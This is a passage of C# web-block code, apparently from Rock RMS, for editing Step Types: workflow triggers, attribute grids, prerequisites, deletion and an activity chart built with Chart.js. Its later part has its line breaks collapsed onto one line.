    hfAddStepWorkflowGuid.Value = triggerGuid.ToString();

    ShowDialog( "StepWorkflows", true );

    UpdateTriggerQualifiers();
}

/// <summary>
/// Save changes to the Workflow Trigger currently displayed in the Workflow properties dialog.
/// </summary>
private void SaveWorkflowProperties()
{
    StepWorkflowTriggerViewModel workflowTrigger = null;

    var guid = hfAddStepWorkflowGuid.Value.AsGuid();

    if ( !guid.IsEmpty() )
    {
        workflowTrigger = WorkflowsState.FirstOrDefault( l => l.Guid.Equals( guid ) );
    }

    if ( workflowTrigger == null )
    {
        workflowTrigger = new StepWorkflowTriggerViewModel();
        workflowTrigger.Guid = Guid.NewGuid();

        WorkflowsState.Add( workflowTrigger );
    }

    // Read the picker once and reuse the value below (the original code read it twice).
    // NOTE(review): .Value throws when no workflow type is selected — presumably the
    // dialog requires a selection; confirm the picker is marked required.
    var selectedWorkflowTypeId = wpWorkflowType.SelectedValueAsId();

    workflowTrigger.WorkflowTypeId = selectedWorkflowTypeId.Value;
    workflowTrigger.TriggerType = ddlTriggerType.SelectedValueAsEnum<StepWorkflowTrigger.WorkflowTriggerCondition>();

    var qualifierSettings = new StepWorkflowTrigger.StatusChangeTriggerSettings
    {
        FromStatusId = ddlPrimaryQualifier.SelectedValue.AsIntegerOrNull(),
        ToStatusId = ddlSecondaryQualifier.SelectedValue.AsIntegerOrNull()
    };

    workflowTrigger.TypeQualifier = qualifierSettings.ToSelectionString();

    // Resolve the display name of the selected workflow type.
    var dataContext = GetDataContext();

    var workflowTypeService = new WorkflowTypeService( dataContext );

    var workflowType = workflowTypeService.Queryable().AsNoTracking().FirstOrDefault( x => x.Id == selectedWorkflowTypeId.Value );

    workflowTrigger.WorkflowTypeName = ( workflowType == null ) ? "(Unknown)" : workflowType.Name;

    BindStepWorkflowsGrid();

    HideDialog();
}

/// <summary>
/// Updates the trigger qualifier drop-downs to match the selected trigger type:
/// the "From"/"To" status lists are only shown for the StatusChanged trigger.
/// </summary>
private void UpdateTriggerQualifiers()
{
    var dataContext = GetDataContext();

    var workflowTrigger = WorkflowsState.FirstOrDefault( l => l.Guid.Equals( hfAddStepWorkflowGuid.Value.AsGuid() ) );

    var sStepWorkflowTriggerType = ddlTriggerType.SelectedValueAsEnum<StepWorkflowTrigger.WorkflowTriggerCondition>();

    if ( sStepWorkflowTriggerType == StepWorkflowTrigger.WorkflowTriggerCondition.StatusChanged )
    {
        // Populate the selection lists for "To Status" and "From Status".
        var stepType = GetStepType();

        var statusList = new StepStatusService( dataContext ).Queryable().Where( s => s.StepProgramId == stepType.StepProgramId ).ToList();

        ddlPrimaryQualifier.Label = "From";
        ddlPrimaryQualifier.Visible = true;
        ddlPrimaryQualifier.Items.Clear();
        ddlPrimaryQualifier.Items.Add( new ListItem( string.Empty, string.Empty ) );

        foreach ( var status in statusList )
        {
            ddlPrimaryQualifier.Items.Add( new ListItem( status.Name, status.Id.ToString().ToUpper() ) );
        }

        ddlSecondaryQualifier.Label = "To";
        ddlSecondaryQualifier.Visible = true;
        ddlSecondaryQualifier.Items.Clear();
        ddlSecondaryQualifier.Items.Add( new ListItem( string.Empty, string.Empty ) );

        foreach ( var status in statusList )
        {
            ddlSecondaryQualifier.Items.Add( new ListItem( status.Name, status.Id.ToString().ToUpper() ) );
        }
    }
    else
    {
        ddlPrimaryQualifier.Visible = false;
        ddlPrimaryQualifier.Items.Clear();
        ddlSecondaryQualifier.Visible = false;
        ddlSecondaryQualifier.Items.Clear();
    }

    // Set the qualifier values.
    if ( workflowTrigger != null )
    {
        if ( workflowTrigger.TriggerType == sStepWorkflowTriggerType )
        {
            var qualifierSettings = new StepWorkflowTrigger.StatusChangeTriggerSettings( workflowTrigger.TypeQualifier );

            ddlPrimaryQualifier.SelectedValue = qualifierSettings.FromStatusId.ToStringSafe();
            ddlSecondaryQualifier.SelectedValue = qualifierSettings.ToStatusId.ToStringSafe();
        }
    }
}

/// <summary>
/// Binds the workflow triggers grid.
/// </summary>
private void BindStepWorkflowsGrid()
{
    if ( WorkflowsState != null )
    {
        SetStepWorkflowListOrder( WorkflowsState );

        // Set the description for the trigger.
        var stepService = new StepWorkflowTriggerService( new RockContext() );

        foreach ( var workflowTrigger in WorkflowsState )
        {
            var qualifierSettings = new StepWorkflowTrigger.StatusChangeTriggerSettings( workflowTrigger.TypeQualifier );

            workflowTrigger.TriggerDescription = stepService.GetTriggerSettingsDescription( workflowTrigger.TriggerType, qualifierSettings );
        }

        gWorkflows.DataSource = WorkflowsState;
    }

    gWorkflows.DataBind();
}

/// <summary>
/// Sorts the workflow trigger list in place, by Workflow Type name then trigger type.
/// </summary>
/// <param name="stepWorkflowList">The workflow trigger list.</param>
private void SetStepWorkflowListOrder( List<StepWorkflowTriggerViewModel> stepWorkflowList )
{
    if ( stepWorkflowList == null || !stepWorkflowList.Any() )
    {
        return;
    }

    // BUG FIX: the original code discarded the result of OrderBy(...).ToList(), making
    // this method a no-op. Materialize the ordered sequence and copy it back so the
    // grid is actually bound in sorted order.
    var orderedTriggers = stepWorkflowList.OrderBy( c => c.WorkflowTypeName )
                                          .ThenBy( c => c.TriggerType.ConvertToString() )
                                          .ToList();

    stepWorkflowList.Clear();
    stepWorkflowList.AddRange( orderedTriggers );
}

/// <summary>
/// Configure the Workflow grid control.
/// </summary>
private void InitializeWorkflowGrid( bool showAdd )
{
    gWorkflows.DataKeyNames = new string[] { "Guid" };
    gWorkflows.Actions.ShowAdd = showAdd;
    gWorkflows.Actions.AddClick += gWorkflows_Add;
    gWorkflows.GridRebind += gWorkflows_GridRebind;
}

#endregion

#endregion

#region Attributes Grid and Picker (Custom)
/// <summary>
/// Get the implementing type of the Attribute Definition.
/// This is the type to which the attribute definition is attached, not the type with which the attribute values are associated.
/// </summary>
/// <returns></returns>
private Type GetAttributeParentEntityType()
{
    return typeof( StepType );
}

/// <summary>
/// Get the prompt shown in the Attribute Definition dialog for the current parent entity.
/// </summary>
/// <returns></returns>
private string GetAttributeDefinitionDialogPrompt()
{
    return string.Format( "Edit Attribute for Participants in Step Type \"{0}\"", tbName.Text );
}

#endregion

#region Attributes Grid and Picker (Common)

// Code in this region should be capable of being reused in other blocks without modification.

/// <summary>
/// Save the Attribute Definition currently displayed in the properties dialog.
/// NOTE(review): this is nearly identical to dlgAttribute_SaveClick, differing only
/// in which hide method is called — a candidate for consolidation.
/// </summary>
protected void SaveAttributeDefinition()
{
    Rock.Model.Attribute attribute = new Rock.Model.Attribute();

    edtAttributes.GetAttributeProperties( attribute );

    // Controls will show warnings
    if ( !attribute.IsValid )
    {
        return;
    }

    if ( AttributesState.Any( a => a.Guid.Equals( attribute.Guid ) ) )
    {
        // Editing an existing attribute: keep its position, then replace it.
        attribute.Order = AttributesState.Where( a => a.Guid.Equals( attribute.Guid ) ).FirstOrDefault().Order;
        AttributesState.RemoveEntity( attribute.Guid );
    }
    else
    {
        // New attribute: append at the end of the current ordering.
        attribute.Order = AttributesState.Any() ? AttributesState.Max( a => a.Order ) + 1 : 0;
    }

    AttributesState.Add( attribute );

    ReOrderAttributes( AttributesState );

    BindAttributesGrid();

    HideDialog();
}

/// <summary>
/// Load the Attribute Definitions attached to the specified parent entity into AttributesState.
/// </summary>
/// <param name="targetEntityTypeId">The entity type id with which the attribute values are associated.</param>
/// <param name="targetEntityParentForeignKeyName">The EntityTypeQualifierColumn identifying the parent entity (e.g. "StepTypeId").</param>
/// <param name="targetEntityParentId">The id of the parent entity; 0 indicates a new (unsaved) parent.</param>
private void LoadAttributeDefinitions( int targetEntityTypeId, string targetEntityParentForeignKeyName, int targetEntityParentId )
{
    if ( targetEntityParentId == 0 )
    {
        // If this is a new step type, then there are no attributes to load
        AttributesState = new List<Attribute>();
        return;
    }

    var dataContext = this.GetDataContext();

    var attributeService = new AttributeService( dataContext );

    AttributesState = attributeService
        .GetByEntityTypeId( targetEntityTypeId, true ).AsQueryable()
        .Where( a =>
            a.EntityTypeQualifierColumn.Equals( targetEntityParentForeignKeyName, StringComparison.OrdinalIgnoreCase ) &&
            a.EntityTypeQualifierValue.Equals( targetEntityParentId.ToString() ) )
        .OrderBy( a => a.Order )
        .ThenBy( a => a.Name )
        .ToList();
}

/// <summary>
/// Load the Attribute Definitions associated with the current record from ViewState.
/// </summary>
private void LoadAttributesViewState()
{
    string json = ViewState["AttributesState"] as string;

    if ( string.IsNullOrWhiteSpace( json ) )
    {
        AttributesState = new List<Attribute>();
    }
    else
    {
        AttributesState = JsonConvert.DeserializeObject<List<Attribute>>( json );
    }
}

/// <summary>
/// Save the Attribute Definitions associated with the current record into ViewState.
/// </summary>
/// <param name="jsonSetting">The serializer settings shared with SaveViewState.</param>
private void SaveAttributesViewState( JsonSerializerSettings jsonSetting )
{
    ViewState["AttributesState"] = JsonConvert.SerializeObject( AttributesState, Formatting.None, jsonSetting );
}
/// <summary>
/// Set the properties of the Attributes grid.
/// </summary>
/// <param name="showAdd">True when the current user may add new attributes.</param>
private void InitializeAttributesGrid( bool showAdd )
{
    gAttributes.DataKeyNames = new string[] { "Guid" };
    gAttributes.AllowPaging = false;
    gAttributes.DisplayType = GridDisplayType.Light;
    gAttributes.ShowConfirmDeleteDialog = false;
    gAttributes.EmptyDataText = Server.HtmlEncode( None.Text );

    gAttributes.Actions.ShowAdd = showAdd;
    gAttributes.Actions.AddClick += gAttributes_Add;
    gAttributes.GridRebind += gAttributes_GridRebind;
    gAttributes.GridReorder += gAttributes_GridReorder;
}

/// <summary>
/// Handles the Add event of the gAttributes control.
/// Opens the attribute dialog for a new (empty) attribute.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param>
protected void gAttributes_Add( object sender, EventArgs e )
{
    gAttributes_ShowEdit( Guid.Empty );
}

/// <summary>
/// Handles the Edit event of the gAttributes control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="RowEventArgs" /> instance containing the event data.</param>
protected void gAttributes_Edit( object sender, RowEventArgs e )
{
    var selectedAttributeGuid = ( Guid ) e.RowKeyValue;

    gAttributes_ShowEdit( selectedAttributeGuid );
}

/// <summary>
/// Shows the edit attribute dialog.
/// </summary>
/// <param name="attributeGuid">The attribute unique identifier.</param>
protected void gAttributes_ShowEdit( Guid attributeGuid )
{
    this.ShowAttributeDefinitionDialog( attributeGuid, GetAttributeParentEntityType(), GetAttributeDefinitionDialogPrompt() );
}

/// <summary>
/// Handles the GridReorder event of the gAttributes control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="GridReorderEventArgs"/> instance containing the event data.</param>
protected void gAttributes_GridReorder( object sender, GridReorderEventArgs e )
{
    SortAttributes( AttributesState, e.OldIndex, e.NewIndex );

    BindAttributesGrid();
}

/// <summary>
/// Handles the Delete event of the gAttributes control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="RowEventArgs" /> instance containing the event data.</param>
protected void gAttributes_Delete( object sender, RowEventArgs e )
{
    var deletedAttributeGuid = ( Guid ) e.RowKeyValue;

    AttributesState.RemoveEntity( deletedAttributeGuid );

    BindAttributesGrid();
}

/// <summary>
/// Handles the GridRebind event of the gAttributes control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param>
protected void gAttributes_GridRebind( object sender, EventArgs e )
{
    BindAttributesGrid();
}
/// <summary>
/// Show the Attribute Definition Properties Dialog.
/// </summary>
/// <param name="attributeGuid">The attribute to edit; Guid.Empty creates a new text attribute.</param>
/// <param name="attachToEntityType">The entity type the attribute definition is attached to.</param>
/// <param name="title">The action title shown in the dialog.</param>
private void ShowAttributeDefinitionDialog( Guid attributeGuid, Type attachToEntityType, string title )
{
    Attribute attribute;

    if ( attributeGuid.Equals( Guid.Empty ) )
    {
        // New attributes default to the Text field type.
        attribute = new Attribute();
        attribute.FieldTypeId = FieldTypeCache.Get( Rock.SystemGuid.FieldType.TEXT ).Id;
    }
    else
    {
        attribute = AttributesState.First( a => a.Guid.Equals( attributeGuid ) );
    }

    edtAttributes.ActionTitle = title;

    // Keys of all other attributes are reserved to prevent duplicates.
    var reservedKeyNames = AttributesState
        .Where( a => !a.Guid.Equals( attributeGuid ) )
        .Select( a => a.Key )
        .ToList();

    edtAttributes.AllowSearchVisible = true;
    edtAttributes.ReservedKeyNames = reservedKeyNames;
    edtAttributes.SetAttributeProperties( attribute, attachToEntityType );

    hfActiveDialog.Value = "ATTRIBUTES";

    dlgAttribute.Show();
}

/// <summary>
/// Hide the Attribute Definition Properties Dialog.
/// </summary>
private void HideAttributeDefinitionDialog()
{
    dlgAttribute.Hide();

    hfActiveDialog.Value = string.Empty;
}

/// <summary>
/// Handles the SaveClick event of the dlgAttribute control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
protected void dlgAttribute_SaveClick( object sender, EventArgs e )
{
    var attribute = new Rock.Model.Attribute();

    edtAttributes.GetAttributeProperties( attribute );

    // Controls will show warnings
    if ( !attribute.IsValid )
    {
        return;
    }

    var existingAttribute = AttributesState.FirstOrDefault( a => a.Guid.Equals( attribute.Guid ) );

    if ( existingAttribute != null )
    {
        // Editing an existing attribute: keep its position, then replace it.
        attribute.Order = existingAttribute.Order;
        AttributesState.RemoveEntity( attribute.Guid );
    }
    else
    {
        // New attribute: append at the end of the current ordering.
        attribute.Order = AttributesState.Any() ? AttributesState.Max( a => a.Order ) + 1 : 0;
    }

    AttributesState.Add( attribute );

    ReOrderAttributes( AttributesState );

    BindAttributesGrid();

    HideAttributeDefinitionDialog();
}

/// <summary>
/// Binds the attributes grid.
/// </summary>
private void BindAttributesGrid()
{
    var attributeRows = AttributesState
        .OrderBy( a => a.Order )
        .ThenBy( a => a.Name )
        .Select( a => new
        {
            a.Id,
            a.Guid,
            a.Name,
            a.Description,
            FieldType = FieldTypeCache.GetName( a.FieldTypeId ),
            a.IsRequired,
            a.IsGridColumn,
            a.AllowSearch
        } )
        .ToList();

    gAttributes.DataSource = attributeRows;
    gAttributes.DataBind();
}

/// <summary>
/// Moves the attribute at oldIndex to newIndex, shifting the displaced attributes by one.
/// </summary>
/// <param name="attributeList">The attribute list.</param>
/// <param name="oldIndex">The old index.</param>
/// <param name="newIndex">The new index.</param>
private void SortAttributes( List<Attribute> attributeList, int oldIndex, int newIndex )
{
    var itemToMove = attributeList.FirstOrDefault( a => a.Order == oldIndex );

    if ( itemToMove == null )
    {
        return;
    }

    if ( newIndex < oldIndex )
    {
        // Moved up: shift the displaced items down one position.
        foreach ( var displacedItem in attributeList.Where( a => a.Order < oldIndex && a.Order >= newIndex ) )
        {
            displacedItem.Order = displacedItem.Order + 1;
        }
    }
    else
    {
        // Moved down: shift the displaced items up one position.
        foreach ( var displacedItem in attributeList.Where( a => a.Order > oldIndex && a.Order <= newIndex ) )
        {
            displacedItem.Order = displacedItem.Order - 1;
        }
    }

    itemToMove.Order = newIndex;
}

/// <summary>
/// Renumbers the attributes' Order values to a contiguous 0..n-1 sequence,
/// preserving the current relative ordering.
/// </summary>
/// <param name="attributeList">The attribute list.</param>
private void ReOrderAttributes( List<Attribute> attributeList )
{
    int nextOrder = 0;

    foreach ( var attribute in attributeList.OrderBy( a => a.Order ).ToList() )
    {
        attribute.Order = nextOrder++;
    }
}

#endregion

#region Internal Methods
/// </summary> /// <returns></returns> private RockContext GetDataContext() { if ( _dataContext == null ) { _dataContext = new RockContext(); } return _dataContext; } /// <summary> /// Initialize handlers for block configuration changes. /// </summary> /// <param name="triggerPanel"></param> private void InitializeSettingsNotification( UpdatePanel triggerPanel ) { // Set up Block Settings change notification. BlockUpdated += Block_BlockUpdated; AddConfigurationUpdateTrigger( triggerPanel ); } /// <summary> /// Initialize the essential context in which this block is operating. /// </summary> /// <returns>True, if the block context is valid.</returns> private bool InitializeBlockContext() { _stepProgramId = PageParameter( PageParameterKey.StepProgramId ).AsInteger(); _stepTypeId = PageParameter( PageParameterKey.StepTypeId ).AsInteger(); if ( _stepProgramId == 0 && _stepTypeId == 0 ) { ShowNotification( "A new Step cannot be added because there is no Step Program available in this context.", NotificationBoxType.Danger, true ); return false; } return true; } /// <summary> /// Populate the selection list for Workflow Trigger Types. /// </summary> private void LoadWorkflowTriggerTypesSelectionList() { ddlTriggerType.Items.Add( new ListItem( "Step Completed", StepWorkflowTrigger.WorkflowTriggerCondition.IsComplete.ToString() ) ); ddlTriggerType.Items.Add( new ListItem( "Status Changed", StepWorkflowTrigger.WorkflowTriggerCondition.StatusChanged.ToString() ) ); ddlTriggerType.Items.Add( new ListItem( "Manual", StepWorkflowTrigger.WorkflowTriggerCondition.Manual.ToString() ) ); } /// <summary> /// Populate the selection list for Prerequisite Steps. /// </summary> private void LoadPrerequisiteStepsList() { var dataContext = GetDataContext(); // Load available Prerequisite Steps. 
var stepType = GetStepType(); int programId = 0; if ( stepType != null ) { programId = stepType.StepProgramId; } if ( programId == 0 ) { programId = _stepProgramId; } var stepsService = new StepTypeService( dataContext ); List<StepType> prerequisiteStepTypes; if ( _stepTypeId == 0 ) { prerequisiteStepTypes = stepsService.Queryable().Where( x => x.StepProgramId == programId && x.IsActive ).ToList(); } else { prerequisiteStepTypes = stepsService.GetEligiblePrerequisiteStepTypes( _stepTypeId ).ToList(); } cblPrerequsities.DataSource = prerequisiteStepTypes; cblPrerequsities.DataBind(); cblPrerequsities.Visible = prerequisiteStepTypes.Count > 0; } /// <summary> /// Shows the detail panel containing the main content of the block. /// </summary> /// <param name="stepTypeId">The entity id of the item to be shown.</param> public void ShowDetail( int stepTypeId ) { pnlDetails.Visible = false; var dataContext = GetDataContext(); // Get the Step Type data model var stepType = GetStepType( stepTypeId ); if ( stepType.Id != 0 ) { pdAuditDetails.SetEntity( stepType, ResolveRockUrl( "~" ) ); } else { // hide the panel drawer that show created and last modified dates pdAuditDetails.Visible = false; } // Admin rights are required to edit a Step Type. Edit rights only allow adding/removing items. 
bool adminAllowed = UserCanAdministrate || stepType.IsAuthorized( Authorization.ADMINISTRATE, CurrentPerson ); pnlDetails.Visible = true; hfStepTypeId.Value = stepType.Id.ToString(); lIcon.Text = string.Format( "<i class='{0}'></i>", stepType.IconCssClass ); bool readOnly = false; nbEditModeMessage.Text = string.Empty; if ( !adminAllowed ) { readOnly = true; nbEditModeMessage.Text = EditModeMessage.ReadOnlyEditActionNotAllowed( StepProgram.FriendlyTypeName ); } if ( readOnly ) { btnEdit.Visible = false; btnDelete.Visible = false; btnSecurity.Visible = false; ShowReadonlyDetails( stepType ); } else { btnEdit.Visible = true; btnDelete.Visible = true; btnSecurity.Visible = true; btnSecurity.Title = "Secure " + stepType.Name; btnSecurity.EntityId = stepType.Id; if ( !stepTypeId.Equals( 0 ) ) { ShowReadonlyDetails( stepType ); } else { ShowEditDetails( stepType ); } } // Set availability of Bulk Entry action. var showBulkEntry = GetAttributeValue( AttributeKey.BulkEntryPage ).IsNotNullOrWhiteSpace() && this.UserCanEdit && stepType.IsAuthorized( Authorization.EDIT, CurrentPerson ); btnBulkEntry.Visible = showBulkEntry; } /// <summary> /// Shows the edit details. 
/// </summary> /// <param name="stepType">The entity instance to be displayed.</param> private void ShowEditDetails( StepType stepType ) { if ( stepType == null ) { stepType = new StepType(); stepType.IconCssClass = "fa fa-compress"; } if ( stepType.Id == 0 ) { lReadOnlyTitle.Text = ActionTitle.Add( StepType.FriendlyTypeName ).FormatAsHtmlTitle(); } else { lReadOnlyTitle.Text = stepType.Name.FormatAsHtmlTitle(); } SetEditMode( true ); LoadAttributeDefinitions( new Step().TypeId, "StepTypeId", stepType.Id ); LoadPrerequisiteStepsList(); LoadWorkflowTriggerTypesSelectionList(); // General properties tbName.Text = stepType.Name; cbIsActive.Checked = stepType.IsActive; tbDescription.Text = stepType.Description; tbIconCssClass.Text = stepType.IconCssClass; cpHighlight.Text = stepType.HighlightColor; cbAllowMultiple.Checked = stepType.AllowMultiple; cbHasDuration.Checked = stepType.HasEndDate; cbShowBadgeCount.Checked = stepType.ShowCountOnBadge; // Pre-requisites if ( stepType.StepTypePrerequisites != null ) { cblPrerequsities.SetValues( stepType.StepTypePrerequisites.Select( x => x.PrerequisiteStepTypeId ) ); } // Advanced Settings dvpAutocomplete.SetValue( stepType.AutoCompleteDataViewId ); dvpAudience.SetValue( stepType.AudienceDataViewId ); cbAllowEdit.Checked = stepType.AllowManualEditing; ceCardTemplate.Text = stepType.CardLavaTemplate; // Workflow Triggers WorkflowsState = new List<StepWorkflowTriggerViewModel>(); foreach ( var trigger in stepType.StepWorkflowTriggers ) { var newItem = new StepWorkflowTriggerViewModel( trigger ); WorkflowsState.Add( newItem ); } BindAttributesGrid(); BindStepWorkflowsGrid(); } /// <summary> /// Shows the readonly details. 
/// </summary> /// <param name="stepType">The entity instance to be displayed.</param> private void ShowReadonlyDetails( StepType stepType ) { SetEditMode( false ); hfStepTypeId.SetValue( stepType.Id ); WorkflowsState = null; lReadOnlyTitle.Text = stepType.Name.FormatAsHtmlTitle(); // Create the read-only description text. var descriptionListMain = new DescriptionList(); descriptionListMain.Add( "Description", stepType.Description ); lStepTypeDescription.Text = descriptionListMain.Html; // Configure Label: Inactive hlInactive.Visible = !stepType.IsActive; RefreshChart(); } /// <summary> /// Delete the current record. /// </summary> private void DeleteRecord() { var rockContext = GetDataContext(); var stepTypeService = new StepTypeService( rockContext ); var stepType = GetStepType( forceLoadFromContext: true ); if ( stepType != null ) { if ( !stepType.IsAuthorized( Authorization.ADMINISTRATE, this.CurrentPerson ) ) { mdDeleteWarning.Show( "You are not authorized to delete this item.", ModalAlertType.Information ); return; } string errorMessage; if ( !stepTypeService.CanDelete( stepType, out errorMessage ) ) { mdDeleteWarning.Show( errorMessage, ModalAlertType.Information ); return; } stepTypeService.Delete( stepType ); rockContext.SaveChanges(); } GoToStepProgramPage(); } /// <summary> /// Gets the specified Step Type data model, or the current model if none is specified. /// </summary> /// <param name="stepType">The entity id of the instance to be retrieved.</param> /// <returns></returns> private StepType GetStepType( int? 
stepTypeId = null, bool forceLoadFromContext = false ) { if ( stepTypeId == null ) { stepTypeId = hfStepTypeId.ValueAsInt(); } string key = string.Format( "StepType:{0}", stepTypeId ); StepType stepType = null; if ( !forceLoadFromContext ) { stepType = RockPage.GetSharedItem( key ) as StepType; } if ( stepType == null ) { var dataContext = GetDataContext(); stepType = new StepTypeService( dataContext ).Queryable() .Where( c => c.Id == stepTypeId ) .FirstOrDefault(); if ( stepType == null ) { stepType = new StepType { Id = 0 }; } RockPage.SaveSharedItem( key, stepType ); } if ( _stepProgramId == default( int ) ) { _stepProgramId = stepType.StepProgramId; } return stepType; } private int GetActiveStepTypeId() { return hfStepTypeId.ValueAsInt(); } /// <summary> /// Sets the edit mode. /// </summary> /// <param name="editable">if set to <c>true</c> [editable].</param> private void SetEditMode( bool editable ) { pnlEditDetails.Visible = editable; pnlViewDetails.Visible = !editable; HideSecondaryBlocks( editable ); } /// <summary> /// Shows the dialog. /// </summary> /// <param name="dialog">The dialog.</param> /// <param name="setValues">if set to <c>true</c> [set values].</param> private void ShowDialog( string dialog, bool setValues = false ) { hfActiveDialog.Value = dialog.ToUpper().Trim(); ShowDialog( setValues ); } /// <summary> /// Shows the dialog. /// </summary> /// <param name="setValues">if set to <c>true</c> [set values].</param> private void ShowDialog( bool setValues = false ) { switch ( hfActiveDialog.Value ) { case "STEPWORKFLOWS": dlgStepWorkflow.Show(); break; } } /// <summary> /// Hides the dialog. 
/// </summary> private void HideDialog() { switch ( hfActiveDialog.Value ) { case "STEPWORKFLOWS": dlgStepWorkflow.Hide(); break; } hfActiveDialog.Value = string.Empty; } #endregion #region Step Activity Chart /// <summary> /// Add scripts for Chart.js components /// </summary> private void InitializeChartScripts() { // NOTE: moment.js must be loaded before Chart.js RockPage.AddScriptLink( "~/Scripts/moment.min.js", true ); RockPage.AddScriptLink( "~/Scripts/Chartjs/Chart.js", true ); } /// <summary> /// Initialize the chart by applying block configuration settings. /// </summary> private void InitializeChartFilter() { // Set the default Date Range from the block settings. var dateRangeSettings = GetAttributeValue( AttributeKey.SlidingDateRange ); if ( !string.IsNullOrEmpty( dateRangeSettings ) ) { drpSlidingDateRange.DelimitedValues = dateRangeSettings; } if ( drpSlidingDateRange.SlidingDateRangeMode == SlidingDateRangePicker.SlidingDateRangeType.All ) { // Default to current year drpSlidingDateRange.SlidingDateRangeMode = SlidingDateRangePicker.SlidingDateRangeType.Current; drpSlidingDateRange.TimeUnit = SlidingDateRangePicker.TimeUnitType.Year; } } /// <summary> /// Refresh the chart using the current filter settings. /// </summary> private void RefreshChart() { // Set the visibility of the Activity Summary chart. bool showActivitySummary = GetAttributeValue( AttributeKey.ShowChart ).AsBoolean( true ); if ( showActivitySummary ) { // If the Step Type does not have any activity, hide the Activity Summary. var dataContext = GetDataContext(); var stepService = new StepService( dataContext ); var stepsQuery = stepService.Queryable().AsNoTracking() .Where( x => x.StepTypeId == _stepTypeId ); showActivitySummary = stepsQuery.Any(); } pnlActivitySummary.Visible = showActivitySummary; if ( !showActivitySummary ) { return; } // Get chart data and set visibility of related elements. 
var reportPeriod = new TimePeriod( drpSlidingDateRange.DelimitedValues ); var chartFactory = this.GetChartJsFactory( reportPeriod ); chartCanvas.Visible = chartFactory.HasData; nbActivityChartMessage.Visible = !chartFactory.HasData; if ( !chartFactory.HasData ) { // If no data, show a notification. nbActivityChartMessage.Text = "There are no Steps matching the current filter."; return; } // Add client script to construct the chart. var chartDataJson = chartFactory.GetJson( sizeToFitContainerWidth: true, maintainAspectRatio: false ); string script = string.Format( @" var barCtx = $('#{0}')[0].getContext('2d'); var barChart = new Chart(barCtx, {1});", chartCanvas.ClientID, chartDataJson ); ScriptManager.RegisterStartupScript( this.Page, this.GetType(), "stepTypeActivityChartScript", script, true ); } /// <summary> /// Gets a configured factory that creates the data required for the chart. /// </summary> /// <returns></returns> public ChartJsTimeSeriesDataFactory<ChartJsTimeSeriesDataPoint> GetChartJsFactory( TimePeriod reportPeriod ) { var dataContext = GetDataContext(); var stepService = new StepService( dataContext ); // Get the Steps associated with the current Step Type. 
var stepsStartedQuery = stepService.Queryable().AsNoTracking() .Where( x => x.StepTypeId == _stepTypeId && x.StepType.IsActive && x.StartDateTime != null ); var stepsCompletedQuery = stepService.Queryable().AsNoTracking() .Where( x => x.StepTypeId == _stepTypeId && x.StepType.IsActive && x.CompletedDateTime != null ); var dateRange = reportPeriod.GetDateRange(); var startDate = dateRange.Start; var endDate = dateRange.End; if ( startDate != null ) { startDate = startDate.Value.Date; stepsStartedQuery = stepsStartedQuery.Where( x => x.StartDateTime >= startDate ); stepsCompletedQuery = stepsCompletedQuery.Where( x => x.CompletedDateTime >= startDate ); } if ( endDate != null ) { var compareDate = endDate.Value.Date.AddDays( 1 ); stepsStartedQuery = stepsStartedQuery.Where( x => x.StartDateTime < compareDate ); stepsCompletedQuery = stepsCompletedQuery.Where( x => x.CompletedDateTime < compareDate ); } // Initialize a new Chart Factory. var factory = new ChartJsTimeSeriesDataFactory<ChartJsTimeSeriesDataPoint>(); if ( reportPeriod.TimeUnit == TimePeriodUnitSpecifier.Year ) { factory.TimeScale = ChartJsTimeSeriesTimeScaleSpecifier.Month; } else { factory.TimeScale = ChartJsTimeSeriesTimeScaleSpecifier.Day; } factory.StartDateTime = startDate; factory.EndDateTime = endDate; factory.ChartStyle = ChartJsTimeSeriesChartStyleSpecifier.Line; // Determine the appropriate date grouping for the chart data points. Func<Step, DateTime> groupKeySelector; if ( factory.TimeScale == ChartJsTimeSeriesTimeScaleSpecifier.Day ) { // Group Steps by Start Date. groupKeySelector = ( x => x.StartDateTime.Value.Date ); } else { // Group Steps by Start Date rounded to beginning of the month. groupKeySelector = ( x => new DateTime( x.StartDateTime.Value.Year, x.StartDateTime.Value.Month, 1 ) ); } // Add data series for Steps started. 
var startedSeriesDataPoints = stepsStartedQuery.ToList() .GroupBy( groupKeySelector ) .Select( x => new ChartDatasetInfo { DatasetName = "Started", DateTime = x.Key, Value = x.Count(), SortKey = "1" } ); if ( factory.TimeScale == ChartJsTimeSeriesTimeScaleSpecifier.Day ) { // Group Steps by Completed Date. groupKeySelector = ( x => x.CompletedDateTime.Value.Date ); } else { // Group Steps by Completed Date rounded to beginning of the month. groupKeySelector = ( x => new DateTime( x.CompletedDateTime.Value.Year, x.CompletedDateTime.Value.Month, 1 ) ); } // Add data series for Steps completed. var completedSeriesDataPoints = stepsCompletedQuery.ToList() .GroupBy( groupKeySelector ) .Select( x => new ChartDatasetInfo { DatasetName = "Completed", DateTime = x.Key, Value = x.Count(), SortKey = "2" } ); var allDataPoints = startedSeriesDataPoints.Union( completedSeriesDataPoints ).OrderBy( x => x.SortKey ).ThenBy( x => x.DateTime ); var dataSetNames = allDataPoints.Select( x => x.DatasetName ).Distinct().ToList(); // Add Dataset for Steps Started. var colorStarted = new RockColor( ChartJsConstants.Colors.Blue ); var startedDataset = this.CreateDataSet( allDataPoints, "Started", colorStarted.ToHex() ); factory.Datasets.Add( startedDataset ); // Add Dataset for Steps Completed. 
